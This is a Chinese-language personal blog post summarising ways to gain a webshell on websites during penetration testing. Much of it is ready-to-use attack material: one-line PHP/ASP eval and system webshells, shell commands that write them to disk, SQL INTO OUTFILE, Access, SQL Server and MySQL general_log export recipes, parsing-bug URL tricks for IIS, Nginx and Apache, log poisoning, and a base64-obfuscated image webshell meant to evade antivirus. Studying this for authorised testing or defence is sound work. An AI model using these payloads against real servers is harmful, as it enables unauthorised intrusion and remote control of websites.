<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script>
(function(){
 if(''){
 if (prompt('请输入文章密码') !== ''){
                 alert('密码错误！');
                                 history.back();
                                             
 }
         
 }
     
 })();
</script>


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-mac-osx.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="v1rus blog" type="application/atom+xml" />






<meta name="description" content="0x01 前言​        今天看到的帖子 里面有很多实用的干货技巧，打一遍码一边加深一下印象 0x02 正片一、 进后台getshell1、管理员后台直接getshell​    管理员后台直接上传Getshell，但是有时候带密码的websell，连接时容易被waf拦截。所以可以上传不加密的webshell。如有权限限制：1、上传的时候如果路径可以控制，那么上传..&#x2F;穿越目录。或者从文件名">
<meta property="og:type" content="article">
<meta property="og:title" content="网站渗透getshell总结&#x2F;1">
<meta property="og:url" content="https://virusday.github.io/2021/01/18/%E7%BD%91%E7%AB%99%E6%B8%97%E9%80%8Fgetshell%E6%80%BB%E7%BB%93/1/index.html">
<meta property="og:site_name" content="v1rus blog">
<meta property="og:description" content="0x01 前言​        今天看到的帖子 里面有很多实用的干货技巧，打一遍码一边加深一下印象 0x02 正片一、 进后台getshell1、管理员后台直接getshell​    管理员后台直接上传Getshell，但是有时候带密码的websell，连接时容易被waf拦截。所以可以上传不加密的webshell。如有权限限制：1、上传的时候如果路径可以控制，那么上传..&#x2F;穿越目录。或者从文件名">
<meta property="article:published_time" content="2021-01-18T00:48:30.019Z">
<meta property="article:modified_time" content="2021-01-18T09:36:33.144Z">
<meta property="article:author" content="Virusday">
<meta property="article:tag" content="Learn">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://virusday.github.io/2021/01/18/网站渗透getshell总结/1/"/>





  <title>网站渗透getshell总结/1 | v1rus blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>
<script type="text/javascript" src="/lib/clipboard/clipboard.js"></script>
<script type="text/javascript" src="/js/src/custom.js"></script>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">v1rus blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">做些有意思的事</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://virusday.github.io/2021/01/18/%E7%BD%91%E7%AB%99%E6%B8%97%E9%80%8Fgetshell%E6%80%BB%E7%BB%93/1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Virusday">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/user.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v1rus blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">网站渗透getshell总结/1</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-01-18T08:48:30+08:00">
                2021-01-18
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2021-01-18T17:36:33+08:00">
                2021-01-18
              </time>
            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.8k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  7
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h2><p>​        今天看到的帖子 里面有很多实用的干货技巧，打一遍码一边加深一下印象</p>
<h2 id="0x02-正片"><a href="#0x02-正片" class="headerlink" title="0x02 正片"></a>0x02 正片</h2><h3 id="一、-进后台getshell"><a href="#一、-进后台getshell" class="headerlink" title="一、 进后台getshell"></a>一、 进后台getshell</h3><h4 id="1、管理员后台直接getshell"><a href="#1、管理员后台直接getshell" class="headerlink" title="1、管理员后台直接getshell"></a>1、管理员后台直接getshell</h4><p>​    管理员后台直接上传Getshell，但是有时候<strong>带密码的websell</strong>，连接时容易<strong>被waf拦截</strong>。所以可以上传不加密的webshell。如有权限限制：1、上传的时候如果路径可以控制，那么上传../穿越目录。或者从文件名改路径。2、管理员后台自带的修改文件名功能在文件名前加../来穿越。  比如：”../v1rus.php”</p>
<h4 id="2、-后台数据库备份getshell（待完善）"><a href="#2、-后台数据库备份getshell（待完善）" class="headerlink" title="2、 后台数据库备份getshell（待完善）"></a>2、 后台数据库备份getshell（待完善）</h4><p>​    后台数据库备份getshell，上传图片马并获取图片马路径，通过数据库备份修改后缀名，如有后缀名无法修改或路径无法修改限制可修改前端代码绕过，当所备份的数据库来源无法修改时，我们可以通过首先将一句话木马写入数据库，比如通过新建管理员用户，将用户名用一句话木马代替（用户名通常有长度限制，在前端修改maxlength即可），<code>&lt;%eval request (&quot;pass&quot;)%&gt;</code> 然后再通过备份数据库后访问此界面Getshell。</p>
<h4 id="3、-各类上传getshell"><a href="#3、-各类上传getshell" class="headerlink" title="3、 各类上传getshell"></a>3、 各类上传getshell</h4><p>​    主要是upload-labs种的内容一些集成。 有一个<strong>解压压缩包文件软连接</strong>之类的东西很好玩。</p>
<h4 id="4、-修改网站上传类型getshell"><a href="#4、-修改网站上传类型getshell" class="headerlink" title="4、 修改网站上传类型getshell"></a>4、 修改网站上传类型getshell</h4><p>​    修改网站上传类型，后台设置中添加aasps|asp|php|jsp|aspx|asa|cer，保存后上传aasps文件，上传后为asp文件可以解析Getshll。或者是在富文本编辑器后台上传getshell。</p>
<h4 id="5、-上传其他脚本类型getshell"><a href="#5、-上传其他脚本类型getshell" class="headerlink" title="5、 上传其他脚本类型getshell"></a>5、 上传其他脚本类型getshell</h4><p>​    一台服务器有多个站，如a网站为asp脚本，b网站为php脚本，而a中限制了上传文件类型为asp的文件，此时可以上传php的脚本，来拿shell；也可以尝试脚本文件后缀名改为asa或者在后面直接加个.如xx.asp.来<strong>突破文件类型限制</strong>进行上传来Getshell。</p>
<h4 id="6、-各类解析漏洞"><a href="#6、-各类解析漏洞" class="headerlink" title="6、 各类解析漏洞"></a>6、 各类解析漏洞</h4><h5 id="IIS6-0解析漏洞"><a href="#IIS6-0解析漏洞" class="headerlink" title="IIS6.0解析漏洞"></a>IIS6.0解析漏洞</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.xxx.com&#x2F;xx.asp&#x2F;xx.jpg</span><br><span class="line">http:&#x2F;&#x2F;www.xxx.com&#x2F;xx.asp&#x2F;xx.txt</span><br><span class="line">http:&#x2F;&#x2F;www.xxx.com&#x2F;xx.asp&#x2F;xx.asp;jpg</span><br></pre></td></tr></table></figure>

<h5 id="IIS7-0-7-5、Nginx-lt-8-0解析漏洞"><a href="#IIS7-0-7-5、Nginx-lt-8-0解析漏洞" class="headerlink" title="IIS7.0/7.5、Nginx&lt;8.0解析漏洞"></a>IIS7.0/7.5、Nginx&lt;8.0解析漏洞</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.xxx.com&#x2F;xx.jpg&#x2F;.php</span><br></pre></td></tr></table></figure>

<h5 id="Nginx-lt-8-03空字节代码执行漏洞"><a href="#Nginx-lt-8-03空字节代码执行漏洞" class="headerlink" title="Nginx&lt;8.03空字节代码执行漏洞"></a>Nginx&lt;8.03空字节代码执行漏洞</h5><p>版本范围：Nginx0.5.,0.6., 0.7 &lt;= 0.7.65, 0.8 &lt;= 0.8.37</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.xxx.com&#x2F;xx.jpg%00.php</span><br></pre></td></tr></table></figure>

<h5 id="Apache解析漏洞"><a href="#Apache解析漏洞" class="headerlink" title="Apache解析漏洞"></a>Apache解析漏洞</h5><p><code>http://www.xxx.com/xx.php.owf.rar</code>逆向解析，直到能解析出php为止</p>
<h5 id="CVE-2013-4547-Nginx解析漏洞"><a href="#CVE-2013-4547-Nginx解析漏洞" class="headerlink" title="CVE-2013-4547 Nginx解析漏洞"></a>CVE-2013-4547 Nginx解析漏洞</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;www.xxx.com&#x2F;xx.jpg（非编码空格）\0.php</span><br></pre></td></tr></table></figure>

<h4 id="7、-编辑器漏洞getshell"><a href="#7、-编辑器漏洞getshell" class="headerlink" title="7、 编辑器漏洞getshell"></a>7、 编辑器漏洞getshell</h4><p><a href="https://navisec.it/%e7%bc%96%e8%be%91%e5%99%a8%e6%bc%8f%e6%b4%9e%e6%89%8b%e5%86%8c/" target="_blank" rel="noopener">https://navisec.it/%e7%bc%96%e8%be%91%e5%99%a8%e6%bc%8f%e6%b4%9e%e6%89%8b%e5%86%8c/</a></p>
<h4 id="8、-网站配置插马"><a href="#8、-网站配置插马" class="headerlink" title="8、 网站配置插马"></a>8、 网站配置插马</h4><p>​    进入后台后，网站配置插马getshell，可以找到<strong>源码本地搭建</strong>，插入时注意与源码闭合，如果插入出错可能导致网站报废。如asp中单引号表示单行注释作用<code>&quot;%&gt;&lt;%eval request(&quot;v1rus&quot;)%&gt;&lt;%&#39;</code></p>
<h4 id="9、-执行sql语句写入webshell"><a href="#9、-执行sql语句写入webshell" class="headerlink" title="9、 执行sql语句写入webshell"></a>9、 执行sql语句写入webshell</h4><p>首先执行错误的sql语句，使其暴露出网站的根目录，以ecshop为例，进入后台执行sql查询<code>select &quot;&lt;?php phpinfo();?&gt;&quot; into outfile &quot;C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php&quot;;</code>关于此语句说明，在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号，有时候也不需要分号。也可以先将一句话通过ecshop的新建管理员写入到user表中，然后通过数据库备份配合解析漏洞Getshell。</p>
<h4 id="10、-命令执行Getshell"><a href="#10、-命令执行Getshell" class="headerlink" title="10、 命令执行Getshell"></a>10、 命令执行Getshell</h4><h5 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h5><ul>
<li><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo ^&lt;^?php @eval($_POST[C0cho]);?^&gt;^ &gt;c:\1.php</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h5 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h5><ul>
<li><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo -e &quot;&lt;?php @assert(\$_POST[C0cho])?&gt;&quot; &gt; 1.php</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>Linux需要在$前加\进行防转义，Windows需要在&lt;前加^防转义，Windows和Linux中的 “可以使用’或不使用进行尝试</p>
<h4 id="11、-文件包含Getshell"><a href="#11、-文件包含Getshell" class="headerlink" title="11、 文件包含Getshell"></a>11、 文件包含Getshell</h4><p>文件包含有时可绕过waf</p>
<h5 id="asp包含"><a href="#asp包含" class="headerlink" title="asp包含"></a>asp包含</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">include file&#x3D;&quot;123.jpg&quot;&#96;调用的文件必须和被调用的文件在同一目录，否则找不到，如果不在同一目录，用下面语句也使用如下代码&#96;include virtual&#x3D;&quot;文件所在目录&#x2F;123.jpg&quot;</span><br></pre></td></tr></table></figure>

<h5 id="php包含"><a href="#php包含" class="headerlink" title="php包含"></a>php包含</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;php</span><br><span class="line">    <span class="keyword">include</span>(<span class="string">'123.jpg'</span>);<span class="comment">//包含图片马</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="12、-数据库命令执行getshell"><a href="#12、-数据库命令执行getshell" class="headerlink" title="12、 数据库命令执行getshell"></a>12、 数据库命令执行getshell</h4><h5 id="Access导出"><a href="#Access导出" class="headerlink" title="Access导出"></a>Access导出</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">table</span> cmd (a <span class="built_in">varchar</span>(<span class="number">50</span>));</span><br><span class="line"><span class="keyword">insert</span> <span class="keyword">into</span> cmd (a) <span class="keyword">values</span> (<span class="string">'一句话木马'</span>)   <span class="comment">#一句话木马如：&lt;%execute request(1)%&gt;</span></span><br><span class="line"><span class="keyword">select</span> * <span class="keyword">into</span> [a] <span class="keyword">in</span> <span class="string">'e:\web\webshellcc\1.asa;x.xls'</span> <span class="string">'excel 4.0;'</span> <span class="keyword">from</span> cmd </span><br><span class="line"><span class="keyword">drop</span> <span class="keyword">table</span> cmd</span><br></pre></td></tr></table></figure>

<p>菜刀直连<code>https://www.webshell.cc/1.asa;x.xls</code></p>
<h5 id="Sqlserver导出"><a href="#Sqlserver导出" class="headerlink" title="Sqlserver导出"></a>Sqlserver导出</h5><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec sp_makewebtask 'C:\test1.php','<span class="keyword">select</span> <span class="string">"&lt;%eval request("</span>pass<span class="string">")%&gt;"</span> <span class="string">'--</span></span><br></pre></td></tr></table></figure>

<h5 id="Mysql导出"><a href="#Mysql导出" class="headerlink" title="Mysql导出"></a>Mysql导出</h5><p><strong>1、</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">create</span> <span class="keyword">TABLE</span> xiaomaT (xiaomaC <span class="built_in">text</span> <span class="keyword">NOT</span> <span class="literal">NULL</span>);</span><br><span class="line"><span class="keyword">insert</span> <span class="keyword">INTO</span> xiaomaT (xiaomaC) <span class="keyword">VALUES</span>(<span class="string">'&lt;?php eval($_POST[xiaoma]);?&gt;'</span>);</span><br><span class="line"><span class="keyword">select</span> xiaomaC <span class="keyword">from</span> xiaomaT <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/phpstudy/www/7.php'</span>;</span><br><span class="line"><span class="keyword">drop</span> <span class="keyword">TABLE</span> <span class="keyword">IF</span> <span class="keyword">EXISTS</span> xiaoma;</span><br></pre></td></tr></table></figure>

<p><strong>2、当网站路径未知时</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">//创建表a,并且将httpd.conf写入到表a中</span><br><span class="line"><span class="keyword">create</span> <span class="keyword">table</span> a(a <span class="built_in">text</span>);</span><br><span class="line"><span class="keyword">load</span> <span class="keyword">data</span> <span class="keyword">infile</span> <span class="string">"C:/phpStudy/Apache/conf/httpd.conf"</span> <span class="keyword">into</span> <span class="keyword">table</span> a;</span><br></pre></td></tr></table></figure>

<p>然后执行导出操作，将该文件下载，使用notepad++打开，最后搜索documentroot，即可找到网站的根目录：</p>
<p><strong>使用php://input</strong>(这个经常配合条件竞争，访问道该php文件然后创建。)</p>
<p>使用burpsuite截取数据包，并修改内容转发(还可以使用hackbar工具中的post data中输入<code>&lt;?php fputs(fopen(&quot;shell1.php&quot;,&quot;w&quot;),&#39;1111&lt;?php @assert($_POST[xss])?&gt;2222&#39;)?&gt;</code>等一句话木马)</p>
<p>*<em>3、 *</em></p>
<p>general_log_file方法获取Webshell</p>
<p><code>show global variables like &#39;secure%&#39;</code>显示secure_file_priv的值为NULL，不能利用写into outfile写木马getshell。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &quot;%genera%&quot;;  #查看genera文件配置情况</span><br><span class="line">set global general_log &#x3D; off;   #关闭general_log  </span><br><span class="line">set global general_log &#x3D; &#39;on&#39;;  #如果general_log关闭需要开启</span><br><span class="line">set global general_log_file &#x3D; &#39;D:&#x2F;www&#x2F;web&#x2F;shell.php&#39;</span><br></pre></td></tr></table></figure>

<p><strong>4、</strong></p>
<p>可执行命令方式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#39;&lt;?php echo \&#39;&lt;pre&gt;\&#39;; system($_GET[\&#39;cmd\&#39;]); echo \&#39;&lt;&#x2F;pre&gt;\&#39;; ?&gt;&#39; INTO OUTFILE &#39;d:&#x2F;www&#x2F;shell.php&#39;</span><br></pre></td></tr></table></figure>

<p><strong>5、 过杀软</strong></p>
<p>上传图片马c.jpg，图片马内容如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>$a = <span class="string">'PD9waHAgQGV2YWwoJF9QT1NUWydjJ10pO2RtdSgpOz8+'</span>; error_reporting(<span class="number">0</span>); @set_time_limit(<span class="number">0</span>); <span class="keyword">eval</span>(<span class="string">"?&gt;"</span>.base64_decode($a));<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>导出Webshell</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="string">'&lt;?php include '</span>c.jpg<span class="string">'?&gt;'</span> <span class="keyword">INTO</span> <span class="keyword">OUTFILE</span> <span class="string">'D:/work/www/shell.php'</span></span><br></pre></td></tr></table></figure>

<p>*<em>6、 *</em></p>
<p>直接导出加密Webshell</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="keyword">unhex</span>(<span class="string">'加密代码'</span>) <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'D:/www/web/shell.php'</span></span><br></pre></td></tr></table></figure>

<h3 id="二、-不进后台getshell"><a href="#二、-不进后台getshell" class="headerlink" title="二、 不进后台getshell"></a>二、 不进后台getshell</h3><h4 id="1、-0day-Getshell"><a href="#1、-0day-Getshell" class="headerlink" title="1、 0day Getshell"></a>1、 0day Getshell</h4><p>各类OA，coremail，cms，php框架，数据库，java框架等0day，1day，nday Getshell</p>
<h4 id="2、-写入日志getshell"><a href="#2、-写入日志getshell" class="headerlink" title="2、 写入日志getshell"></a>2、 写入日志getshell</h4><p>获取日志路径，在访问过程中在url或者其他位置写入<code>&lt;?php eval($_POST[c]);?&gt;</code>等信息，使其日志记录此代码，然后访问日志路径，菜刀连接Getshell，如phpinfo();中能查看到error.log和access.log的路径。</p>
<p>这个其实也多用于文件包含，并且也要知道日志的位置。</p>
<h4 id="3、-IIS-Tomcat写权限getshell"><a href="#3、-IIS-Tomcat写权限getshell" class="headerlink" title="3、 IIS/Tomcat写权限getshell"></a>3、 IIS/Tomcat写权限getshell</h4><p>IIS6.0，put协议上传手工或工具，批量扫描工具：iis put scaner，写权限利用：桂林老兵</p>
<p>Tomcat put上传 CVE-2017-12615 工具传送门：</p>
<h4 id="4-、-注入漏洞getshell"><a href="#4-、-注入漏洞getshell" class="headerlink" title="4 、 注入漏洞getshell"></a>4 、 注入漏洞getshell</h4><p><a href="https://choge.top/2020/03/19/MsSQL%E6%B3%A8%E5%85%A5/" target="_blank" rel="noopener">https://choge.top/2020/03/19/MsSQL%E6%B3%A8%E5%85%A5/</a></p>
<h4 id="5、-远程命令执行"><a href="#5、-远程命令执行" class="headerlink" title="5、 远程命令执行"></a>5、 远程命令执行</h4><p>Linux/Windows反弹shell，脚本语言、powershell反弹shell，Kali/Cobalt Strike等各种上线方法。主要是靠反弹shell进行上线。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/01/08/%E5%8D%95%E7%82%B9%E7%99%BB%E5%BD%95%E7%88%86%E7%A0%B4%E5%9F%BA%E4%BA%8E%E5%8A%A0%E5%AF%86/1/" rel="next" title="单点登录爆破基于加密/1">
                <i class="fa fa-chevron-left"></i> 单点登录爆破基于加密/1
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/01/19/hta%E5%85%8D%E6%9D%80/hta%E6%B5%85%E6%9E%90/" rel="prev" title="hta免杀/hta浅析">
                hta免杀/hta浅析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/user.jpg"
                alt="Virusday" />
            
              <p class="site-author-name" itemprop="name">Virusday</p>
              <p class="site-description motion-element" itemprop="description">学习的日常</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">72</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <!-- modify icon to fire by szw -->
                <i class="fa fa-history fa-" aria-hidden="true"></i>
                近期文章
              </div>
              <ul class="links-of-blogroll-list">
                
                
                  <li class="recent_posts_li">
                    <a href="/2021/07/19/java/java%E9%80%86%E5%90%91/1/" title="java/java逆向/1" target="_blank">java/java逆向/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/07/15/%E8%BF%87d%E7%9B%BE%E5%B0%8F%E9%A9%AC%E5%88%86%E6%9E%90/1/" title="过d盾小马分析/1" target="_blank">过d盾小马分析/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/06/30/java/shiro%E9%85%8D%E5%90%88spring/1/" title="java/shiro配合spring/1" target="_blank">java/shiro配合spring/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/06/15/java/el%E8%A1%A8%E8%BE%BE%E5%BC%8F%E4%B8%8ESPel%E8%A1%A8%E8%BE%BE%E5%BC%8F/1/" title="java/el表达式与SPel表达式/1" target="_blank">java/el表达式与SPel表达式/1</a>
                  </li>
                
                  <li class="recent_posts_li">
                    <a href="/2021/06/07/java/java%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%BA%95%E5%B1%82/1/" title="java/java命令执行底层/1" target="_blank">java/java命令执行底层/1</a>
                  </li>
                
              </ul>
            </div>
          
          
          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-前言"><span class="nav-number">1.</span> <span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-正片"><span class="nav-number">2.</span> <span class="nav-text">0x02 正片</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#一、-进后台getshell"><span class="nav-number">2.1.</span> <span class="nav-text">一、 进后台getshell</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、管理员后台直接getshell"><span class="nav-number">2.1.1.</span> <span class="nav-text">1、管理员后台直接getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、-后台数据库备份getshell（待完善）"><span class="nav-number">2.1.2.</span> <span class="nav-text">2、 后台数据库备份getshell（待完善）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、-各类上传getshell"><span class="nav-number">2.1.3.</span> <span class="nav-text">3、 各类上传getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4、-修改网站上传类型getshell"><span class="nav-number">2.1.4.</span> <span class="nav-text">4、 修改网站上传类型getshell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" 